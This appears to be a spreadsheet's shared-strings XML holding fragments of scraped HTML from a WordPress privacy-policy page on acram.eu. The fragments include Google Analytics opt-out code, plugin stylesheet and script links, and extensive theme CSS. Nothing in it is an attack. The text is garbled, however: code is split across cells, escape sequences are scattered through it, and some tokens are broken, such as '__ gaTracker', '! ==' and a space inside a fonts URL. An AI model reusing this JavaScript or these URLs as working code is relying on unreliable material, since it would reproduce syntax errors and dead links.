    <t>Disable tracking if the opt-out cookie exists. */_x005F_x000D_
	if ( __gaTrackerIsOptedOut() ) {_x005F_x000D_
		window[disableStr] = true;_x005F_x000D_
	}_x005F_x000D_
_x005F_x000D_
	/* Opt-out function */_x005F_x000D_
	function __gaTrackerOptout() {_x005F_x000D_
	  document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';_x005F_x000D_
	  window[disableStr] = true;_x005F_x000D_
	}_x005F_x000D_
	_x005F_x000D_
	if ( mi_track_user ) {_x005F_x000D_
		(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){_x005F_x000D_
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),_x005F_x000D_
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)_x005F_x000D_
		})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');_x005F_x000D_
_x005F_x000D_
		__gaTracker('create', 'UA-88361826-1', 'auto');
		__ gaTracker('set', 'forceSSL', true);
		__gaTracker('send','pageview');
	} else {_x005F_x000D_
		console.log( "" );_x005F_x000D_
		(function() {_x005F_x000D_
			/* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */_x005F_x000D_
			var noopfn = function() {_x005F_x000D_
				return null;_x005F_x000D_
			};_x005F_x000D_
			var noopnullfn = function() {_x005F_x000D_
				return null;_x005F_x000D_
			};_x005F_x000D_
			var Tracker = function() {_x005F_x000D_
				return null;_x005F_x000D_
			};_x005F_x000D_
			var p = Tracker.prototype;_x005F_x000D_
			p.get = noopfn;_x005F_x000D_
			p.set = noopfn;_x005F_x000D_
			p.send = noopfn;_x005F_x000D_
			var __</t>
  </si>
  <si>
    <t>gaTracker = function() {_x005F_x000D_
				var len = arguments.length;_x005F_x000D_
				if ( len === 0 ) {_x005F_x000D_
					return;_x005F_x000D_
				}_x005F_x000D_
				var f = arguments[len-1];_x005F_x000D_
				if ( typeof f ! == 'object' || f === null || typeof f.hitCallback ! == 'function' )</t>
  </si>
  <si>
    <t>{_x005F_x000D_
					console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason );_x005F_x000D_
					return;_x005F_x000D_
				}_x005F_x000D_
				try {_x005F_x000D_
					f.hitCallback();_x005F_x000D_
				} catch (ex) {_x005F_x000D_
_x005F_x000D_
				}_x005F_x000D_
			};_x005F_x000D_
			__gaTracker.create = function() {_x005F_x000D_
				return new Tracker();_x005F_x000D_
			};_x005F_x000D_
			__gaTracker.getByName = noopnullfn;_x005F_x000D_
			__gaTracker.getAll = function() {_x005F_x000D_
				return [];_x005F_x000D_
			};_x005F_x000D_
			__gaTracker.remove = noopfn;_x005F_x000D_
			window['__gaTracker'] = __gaTracker;_x005F_x000D_
					})();_x005F_x000D_
		}_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
		&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/acram.eu\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.22"}};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[55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}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t>
  </si>
  <si>
    <t>important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
&lt;link rel="stylesheet" id="layerslider-css" href="https://acram.eu/wp-content/plugins/LayerSlider/static/css/layerslider.css?ver=5.6.9" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="ls-google-fonts-css" href="https://fonts.googleapis.com/ css?family=Lato:100,300,regular,700,900%7COpen+Sans:300%7CIndie+Flower:regular%7COswald:300,regular,700&amp;#038;subset=latin%2Clatin-ext" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="contact-form-7-css" href="https://acram.eu/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.7" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="es-widget-css-css" href="https://acram.eu/wp-content/plugins/email-subscribers/widget/es-widget.css?ver=4.9.22" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="rs-plugin-settings-css" href="https://acram.eu/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.2.6" type="text/css" media="all" /&gt;
&lt;style id="rs-plugin-settings-inline-css" type="text/css"&gt;
#rs-demo-id {}
&lt;/style&gt;
&lt;link rel="stylesheet" id="simple-share-buttons-adder-indie-css" href="//fonts.googleapis.com/css?family=Indie+Flower&amp;#038;ver=4.9.22" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="simple-share-buttons-adder-font-awesome-css" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=4.9.22" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="inbound-shortcodes-css" href="https://acram.eu/wp-content/plugins/landing-pages//shared/shortcodes/css/frontend-render.css?ver=4.9.22" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="style-css" href="https://acram.eu/wp-content/themes/betheme/style.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="mfn-base-css" href="https://acram.eu/wp-content/themes/betheme/css/base.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="mfn-layout-css" href="https://acram.eu/wp-content/themes/betheme/css/layout.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="mfn-shortcodes-css" href="https://acram.eu/wp-content/themes/betheme/css/shortcodes.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="mfn-animations-css" href="https://acram.eu/wp-content/themes/betheme/assets/animations/animations.min.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="mfn-jquery-ui-css" href="https://acram.eu/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="mfn-prettyPhoto-css" href="https://acram.eu/wp-content/themes/betheme/assets/prettyPhoto/prettyPhoto.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="mfn-jplayer-css" href="https://acram.eu/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="mfn-responsive-css" href="https://acram.eu/wp-content/themes/betheme/css/responsive.css?ver=14.3" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="Lato-css" href="https://fonts.googleapis.com/ css?family=Lato%3A1%2C300%2C400%2C400italic%2C700%2C700italic&amp;#038;ver=4.9.22" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="addthis_all_pages-css" href="https://acram.eu/wp-content/plugins/addthis/frontend/build/addthis_wordpress_public.min.css?ver=4.9.22" type="text/css" media="all" /&gt;
&lt;script type="text/javascript"&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,pdf,ppt,zip,xls,docx,pptx,xlsx","inbound_paths":"[]","home_url":"https:\/\/acram.eu","hash_tracking":"false"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.10.4"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-content/plugins/LayerSlider/static/js/greensock.js?ver=1.11.8"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-includes/js/jquery/jquery.js?ver=1.12.4"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;
/* &lt;! [CDATA[ */
var LS_Meta = {"v":"5.6.9"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-content/plugins/LayerSlider/static/js/layerslider.kreaturamedia.jquery.js?ver=5.6.9"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-content/plugins/LayerSlider/static/js/layerslider.transitions.js?ver=5.6.9"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.2.6"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.2.6"&gt;&lt;/script&gt;
&lt;script id="st_insights_js" type="text/javascript" src="https://ws.sharethis.com/button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&amp;#038;product=simpleshare"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;
/* &lt;! [CDATA[ */
var inbound_settings = {"post_id":"1764","post_type":"page","variation_id":"0","ip_address":"66.249.89.95","wp_lead_data":{"lead_id":null,"lead_email":null,"lead_uid":null,"lead_nonce":null},"admin_url":"https:\/\/acram.eu\/wp-admin\/admin-ajax.php","track_time":"2023\/04\/08 17:42:17","page_tracking":"off","search_tracking":"off","comment_tracking":"off","custom_mapping":[],"is_admin":"","ajax_nonce":"63918330a3"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type="text/javascript" src="https://acram.eu/wp-content/plugins/landing-pages//shared/assets/js/frontend/analytics/inboundAnalytics.min.js"&gt;&lt;/script&gt;
&lt;meta name="generator" content="Powered by LayerSlider 5.6.9 - Multi-Purpose, Responsive, Parallax, Mobile-Friendly Slider Plugin for WordPress."</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
_x005F_x000D_
&lt;link rel="https://api.w.org/" href="https://acram.eu/wp-json/" /&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://acram.eu/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://acram.eu/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 4.9.22" /&gt;
&lt;link rel="canonical" href="https://acram.eu/privacy-policy/" /&gt;
&lt;link rel="shortlink" href="https://acram.eu/?p=1764" /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://acram.eu/wp-json/oembed/1.0/embed?url=https%3A%2F%2Facram.eu%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://acram.eu/wp-json/oembed/1.0/embed?url=https%3A%2F%2Facram.eu%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;style id="mfn-dnmc-bg-css"&gt;
#Subheader{background-image:url(http://acram.eu/wp-content/uploads/2019/03/main_background05.jpg);background-repeat:no-repeat;background-position:center}
&lt;/style&gt;
&lt;style id="mfn-dnmc-style-css"&gt;
@media only screen and (min-width: 1240px) {body:not(.header-simple) #Top_bar #menu{display:block!important}.tr-menu #Top_bar #menu{background:none!important}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu{width:984px}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu &gt; li{float:left}#Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu &gt; li.mfn-megamenu-cols-1{width:100%}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu &gt; li.mfn-megamenu-cols-2{width:50%}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu &gt; li.mfn-megamenu-cols-3{width:33.33%}#Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu &gt; li.mfn-megamenu-cols-4{width:25%}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu &gt; li.mfn-megamenu-cols-5{width:20%}#Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu &gt; li.mfn-megamenu-cols-6{width:16.66%}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu &gt; li &gt; ul{display:block!important;position:inherit;left:auto;top:auto;border-width:0 1px 0</t>
  </si>
  <si>
    <t>0}#Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; ul.mfn-megamenu &gt; li:last-child &gt; ul{border:0}#Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu &gt; li &gt; ul li{width: auto}#Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu a.mfn-megamenu-title{text-transform:uppercase;font-weight:400;background:none}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu a .menu-arrow{display:none}.menuo-right #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; ul.mfn-megamenu{left:auto;right:0}.menuo-right #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu-bg{box-sizing:border-box}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu-bg{padding:20px 166px 20px 20px;background-repeat:no-repeat;background-position:bottom right}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu-bg &gt; li{background:none}#Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu-bg &gt; li a{border:none}#Top_bar .menu &gt; li &gt; ul.mfn-megamenu-bg &gt; li &gt; ul{background:none!important;-webkit-box-shadow:0 0 0 0;-moz-box-shadow:0 0 0 0;box-shadow:0 0 0 0}.mm-vertical #Top_bar .container{position:relative;}.mm-vertical #Top_bar .top_bar_left{position:static;}.mm-vertical #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li ul{box-shadow:0 0 0 0 transparent!important;background-image:none;}.mm-vertical #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu{width:98%!important;margin:0 1%;padding:20px 0;}.mm-vertical.header-plain #Top_bar .menu &gt; li &gt; ul.mfn-megamenu{width:100%!important;margin:0;}.mm-vertical #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; ul.mfn-megamenu &gt; li{display:table-cell;float:none;width:10%;padding:0 15px;border-right:1px solid rgba(0, 0, 0, 0.05);}.mm-vertical #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu &gt; li:last-child{border-right-width:0}.mm-vertical #Top_bar .menu &gt; li &gt; ul.mfn-megamenu &gt; li.hide-border{border-right-width:0}.mm-vertical #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; ul.mfn-megamenu &gt; li a{border-bottom-width:0;padding:9px 15px;line-height:120%;}.mm-vertical #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu a.mfn-megamenu-title{font-weight:700;}#Header_creative #Top_bar .menu &gt; li &gt; ul.mfn-megamenu{width:980px!important;margin:0;}.header-plain:not(.menuo-right)</t>
  </si>
  <si>
    <t>#Header .top_bar_left{width:auto!important}.header-stack.header-center #Top_bar #menu{display:inline-block!important}.header-simple #Top_bar #menu{display:none;height:auto;width:300px;bottom:auto;top:100%;right:1px;position:absolute;margin:0}.header-simple #Header a.responsive-menu-toggle{display:block;line-height:35px;font-size:25px;position:absolute;right:10px}.header-simple #Header a:hover.responsive-menu-toggle{text-decoration:none}.header-simple #Top_bar #menu &gt; ul{width:100%;float:left}.header-simple #Top_bar #menu ul li{width:100%;padding-bottom:0;border-right:0;position:relative}.header-simple #Top_bar #menu ul li a{padding:0 20px;margin:0;display:block;height:auto;line-height:normal;border:none}.header-simple #Top_bar #menu ul li a:after{display:none}.header-simple #Top_bar #menu ul li a span{border:none;line-height:48px;display:inline;padding:0}.header-simple #Top_bar #menu ul li.submenu .menu-toggle{display:block;position:absolute;right:0;top:0;width:48px;height:48px;line-height:48px;font-size:30px;text-align:center;color:#d6d6d6;border-left:1px solid #eee;cursor:pointer}.header-simple #Top_bar #menu ul li.submenu .menu-toggle:after{content:"+"}.header-simple #Top_bar #menu ul li.hover &gt; .menu-toggle:after{content:"-"}.header-simple #Top_bar #menu ul li.hover a{border-bottom:0}.header-simple #Top_bar #menu ul.mfn-megamenu li .menu-toggle{display:none}.header-simple #Top_bar #menu ul li ul{position: relative!important;left:0!important;top:0;padding:0;margin:0!important;width:auto!important;background-image:none}.header-simple #Top_bar #menu ul li ul li{width:100%!important;display:block;padding:0;}.header-simple #Top_bar #menu ul li ul li</t>
  </si>
  <si>
    <t>a{padding:0 20px 0 30px}.header-simple #Top_bar #menu ul li ul li a .menu-arrow{display:none}.header-simple #Top_bar #menu ul li ul li a span{padding:0}.header-simple #Top_bar #menu ul li ul li a span:after{display:none!important}.header-simple #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu a.mfn-megamenu-title{text-transform:uppercase;font-weight:400}.header-simple #Top_bar .menu &gt; li &gt; ul.mfn-megamenu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul{display:block!important;position:inherit;left:auto;top:auto}.header-simple #Top_bar #menu ul li ul li ul{border-left:0!important;padding:0;top:0}.header-simple #Top_bar #menu ul li ul li ul li a{padding:0 20px 0 40px}.rtl.header-simple #Top_bar #menu{left:1px;right:auto}.rtl.header-simple #Top_bar a.responsive-menu-toggle{left:10px;right:auto}.rtl.header-simple #Top_bar #menu ul li.submenu .menu-toggle{left:0;right:auto;border-left:none;border-right:1px solid #eee}.rtl.header-simple #Top_bar #menu ul li ul{left:auto!important;right:0!important}.rtl.header-simple #Top_bar #menu ul li ul li a{padding:0 30px 0</t>
  </si>
  <si>
    <t>20px}.rtl.header-simple #Top_bar #menu ul li ul li ul li a{padding:0 40px 0 20px}.menu-highlight #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li{margin:0 2px}.menu-highlight:not(.header-creative) #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a{margin:20px 0;padding:0;-webkit-border-radius:5px;border-radius:5px}.menu-highlight #Top_bar .menu &gt; li &gt; a:after{display:none}.menu-highlight #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a span:not(.description){line-height:50px}.menu-highlight #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a span.description{display:none}.menu-highlight.header-stack #Top_bar .menu &gt; li &gt; a{margin:10px 0!important}.menu-highlight.header-stack #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a span:not(.description){line-height:40px}.menu-highlight.header-fixed #Top_bar .menu &gt; li &gt; a{margin:10px 0!important;padding:5px 0}.menu-highlight.header-fixed #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a span{line-height:30px}.menu-highlight.header-transparent #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a{margin:5px 0}.menu-highlight.header-simple #Top_bar #menu ul li,.menu-highlight.header-creative #Top_bar #menu ul li{margin:0}.menu-highlight.header-simple #Top_bar #menu ul li &gt; a,.menu-highlight.header-creative #Top_bar #menu ul li &gt; a{-webkit-border-radius:0;border-radius:0}.menu-highlight:not(.header-simple) #Top_bar.is-sticky .menu &gt; li &gt; a{margin:10px 0!important;padding:5px 0!important}.menu-highlight:not(.header-simple) #Top_bar.is-sticky .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a span{line-height:30px!important}.header-modern.menu-highlight.menuo-right .menu_wrapper{margin-right:20px}.menu-line-below #Top_bar .menu &gt; li &gt; a:after{top:auto;bottom:-4px}.menu-line-below #Top_bar.is-sticky .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a:after{top:auto;bottom:-4px}.menu-line-below-80 #Top_bar:not(.is-sticky) .menu &gt; li &gt; a:after{height:4px;left:10%;top:50%;margin-top:20px;width:80%}.menu-line-below-80-1 #Top_bar:not(.is-sticky) .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a:after{height:1px;left:10%;top:50%;margin-top:20px;width:80%}.menu-arrow-top #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a:after{background:none repeat scroll 0 0 rgba(0,0,0,0)!important;border-color:#ccc transparent transparent;border-style:solid;border-width:7px 7px 0;display:block;height:0;left:50%;margin-left:-7px;top:0!important;width:0}.menu-arrow-top.header-transparent #Top_bar .menu &gt; li &gt; a:after,.menu-arrow-top.header-plain #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a:after{display:none}.menu-arrow-top #Top_bar.is-sticky .menu &gt; li &gt; a:after{top:0!important}.menu-arrow-bottom #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a:after{background:none!important;border-color:transparent transparent #ccc;border-style:solid;border-width:0 7px 7px;display:block;height:0;left:50%;margin-left:-7px;top:auto;bottom:0;width:0}.menu-arrow-bottom.header-transparent #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a:after,.menu-arrow-bottom.header-plain #Top_bar .menu &gt; li &gt; a:after{display:none}.menu-arrow-bottom #Top_bar.is-sticky .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a:after{top:auto;bottom:0}.menuo-no-borders #Top_bar .menu &gt; li &gt; a span:not(.description){border-right-width:0}.menuo-no-borders #Header_creative #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a span{border-bottom-width:0}.menuo-right #Top_bar .menu_wrapper{float:right}.menuo-right.header-stack:not(.header-center) #Top_bar .menu_wrapper{margin-right:150px}body.header-creative{padding-left:50px}body.header-creative.header-open{padding-left:250px}body.error404,body.under-construction,body.template-blank{padding-left:0!important}.header-creative.footer-fixed #Footer,.header-creative.footer-sliding #Footer{left:25px}.header-open.footer-fixed #Footer,.header-open.footer-sliding #Footer{left:125px}.header-rtl.header-creative.footer-fixed #Footer,.header-rtl.header-creative.footer-sliding #Footer{left:auto;right:5px}.header-rtl.header-open.footer-fixed #Footer,.header-rtl.header-open.footer-sliding #Footer{left:auto;right:125px}#Header_creative{background:#fff;position:fixed;width:250px;height:100%;left:-200px;top:0;z-index:9002;-webkit-box-shadow:2px 0 4px 2px rgba(0,0,0,.15);box-shadow:2px 0 4px 2px rgba(0,0,0,.15)}#Header_creative .container{width:100%}#Header_creative .creative-wrapper{display:</t>
  </si>
  <si>
    <t>none}#Header_creative a.creative-menu-toggle{display:block;width:35px;height:35px;line-height:35px;font-size:25px;text-align:center;position:absolute;top:10px;right:8px;-webkit-border-radius:3px;border-radius:3px}.admin-bar #Header_creative a.creative-menu-toggle{top:42px}#Header_creative #Top_bar{position:static;width:100%}#Header_creative #Top_bar .top_bar_left{width:100%!important;float: none}#Header_creative #Top_bar .top_bar_right{width:100%!important;float: none;height:auto;margin-bottom:35px;text-align:center;padding:0 20px;top:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#Header_creative #Top_bar .top_bar_right:before{display:none}#Header_creative #Top_bar .top_bar_right_wrapper{top:0}#Header_creative</t>
  </si>
  <si>
    <t>#Top_bar .logo{float: none;text-align:center;margin:15px 0}#Header_creative #Top_bar .menu_wrapper{float:</t>
  </si>
  <si>
    <t>none;margin:0 0 30px}#Header_creative #Top_bar .menu &gt; li{width:100%;float:none;position:relative}#Header_creative #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a{padding:0;text-align: center}#Header_creative #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a:after{display:none}#Header_creative #Top_bar .menu &gt; li &gt; a span{border-right:0;border-bottom-width:1px;line-height:38px}#Header_creative #Top_bar .menu li</t>
  </si>
  <si>
    <t>ul{left:100%;right:auto;top:0;box-shadow:2px 2px 2px 0 rgba(0,0,0,0.03);-webkit-box-shadow:2px 2px 2px 0 rgba(0,0,0,0.03)}#Header_creative #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul.mfn-megamenu{width:700px!important;}#Header_creative #Top_bar .menu &gt; li &gt; ul.mfn-megamenu &gt; li &gt;</t>
  </si>
  <si>
    <t>ul{left:0}#Header_creative #Top_bar .menu li ul li a{padding-top:9px;padding-bottom:8px}#Header_creative #Top_bar .menu li ul li ul{top:0!important}#Header_creative #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a span.description{display:block;font-size:13px;line-height:28px!important;clear:both}#Header_creative #Top_bar .search_wrapper{left:100%;top: auto;bottom:-90px}#Header_creative #Top_bar a#header_cart{display:inline-block;float:none;top:3px}#Header_creative #Top_bar a#search_button{display:inline-block;float:none;top:3px}#Header_creative #Top_bar .wpml-languages{display:inline-block;float:</t>
  </si>
  <si>
    <t>none;top:0}#Header_creative #Top_bar .wpml-languages.enabled:hover a.active{padding-bottom:9px}#Header_creative #Top_bar a.button.action_button{display:inline-block;float:none;top:16px;margin:0}#Header_creative #Top_bar .banner_wrapper{display:block;text-align:center}#Header_creative #Top_bar .banner_wrapper img{max-width:100%;height:auto;display:inline-block}#Header_creative #Action_bar{position:absolute;bottom:0;top:auto;clear:both;padding:0 20px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#Header_creative #Action_bar .social{float:none;text-align:center;padding:5px 0</t>
  </si>
  <si>
    <t>15px}#Header_creative #Action_bar .social li{margin-bottom:2px}#Header_creative .social li a{color:rgba(0,0,0,.5)}#Header_creative .social li a:hover{color:#000}#Header_creative .creative-social{position:absolute;bottom:10px;right:0;width:50px}#Header_creative .creative-social li{display:block;float:none;width:100%;text-align:center;margin-bottom:5px}.header-creative .fixed-nav.fixed-nav-prev{margin-left:50px}.header-creative.header-open .fixed-nav.fixed-nav-prev{margin-left:250px}.menuo-last #Header_creative #Top_bar .menu li.last ul{top:auto;bottom:0}.header-open #Header_creative{left:0}.header-open #Header_creative .creative-wrapper{display:block}.header-open #Header_creative .creative-menu-toggle,.header-open #Header_creative .creative-social{display:none}body.header-rtl.header-creative{padding-left:0;padding-right:50px}.header-rtl #Header_creative{left:auto;right:-200px}.header-rtl.nice-scroll #Header_creative{margin-right:10px}.header-rtl #Header_creative a.creative-menu-toggle{left:8px;right:auto}.header-rtl #Header_creative .creative-social{left:0;right:auto}.header-rtl #Footer #back_to_top.sticky{right:125px}.header-rtl #popup_contact{right:70px}.header-rtl #Header_creative #Top_bar .menu</t>
  </si>
  <si>
    <t>li ul{left:auto;right:100%}.header-rtl #Header_creative #Top_bar .search_wrapper{left:auto;right:100%;}.header-rtl .fixed-nav.fixed-nav-prev{margin-left:0!important}.header-rtl .fixed-nav.fixed-nav-next{margin-right:50px}body.header-rtl.header-creative.header-open{padding-left:0;padding-right:250px!important}.header-rtl.header-open #Header_creative{left:auto;right:0}.header-rtl.header-open #Footer #back_to_top.sticky{right:325px}.header-rtl.header-open #popup_contact{right:270px}.header-rtl.header-open .fixed-nav.fixed-nav-next{margin-right:250px}.header-creative .vc_row[data-vc-full-width]{padding-left:50px}.header-creative.header-open .vc_row[data-vc-full-width]{padding-left:250px}#Header_creative.scroll{height:100%;overflow-y:auto}#Header_creative.scroll:not(.dropdown) .menu li ul{display:none!important}#Header_creative.scroll #Action_bar{position:static}#Header_creative.dropdown{outline:none}#Header_creative.dropdown #Top_bar .menu_wrapper{float:left}#Header_creative.dropdown #Top_bar #menu ul li{position:relative;float:left}#Header_creative.dropdown #Top_bar #menu ul li a:after{display:none}#Header_creative.dropdown #Top_bar #menu ul li a span{line-height:38px;padding:0}#Header_creative.dropdown #Top_bar #menu ul li.submenu .menu-toggle{display:block;position:absolute;right:0;top:0;width:38px;height:38px;line-height:38px;font-size:26px;text-align:center;color:#d6d6d6;border-left:1px solid #eee;cursor:pointer}#Header_creative.dropdown #Top_bar #menu ul li.submenu .menu-toggle:after{content:"+"}#Header_creative.dropdown #Top_bar #menu ul li.hover &gt; .menu-toggle:after{content:"-"}#Header_creative.dropdown #Top_bar #menu ul li.hover a{border-bottom:0}#Header_creative.dropdown #Top_bar #menu ul.mfn-megamenu li .menu-toggle{display:none}#Header_creative.dropdown #Top_bar #menu ul li ul{position:relative!important;left:0!important;top:0;padding:0;margin-left:0!important;width:auto!important;background-image:none}#Header_creative.dropdown #Top_bar #menu ul li ul li{width:100%!important}#Header_creative.dropdown #Top_bar #menu ul li ul li a{padding:0 10px;text-align:center}#Header_creative.dropdown #Top_bar #menu ul li ul li a .menu-arrow{display:none}#Header_creative.dropdown #Top_bar #menu ul li ul li a span{padding:0}#Header_creative.dropdown #Top_bar #menu ul li ul li a span:after{display:none!important}#Header_creative.dropdown #Top_bar .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; ul.mfn-megamenu a.mfn-megamenu-title{text-transform:uppercase;font-weight:400}#Header_creative.dropdown #Top_bar .menu &gt; li &gt;</t>
  </si>
  <si>
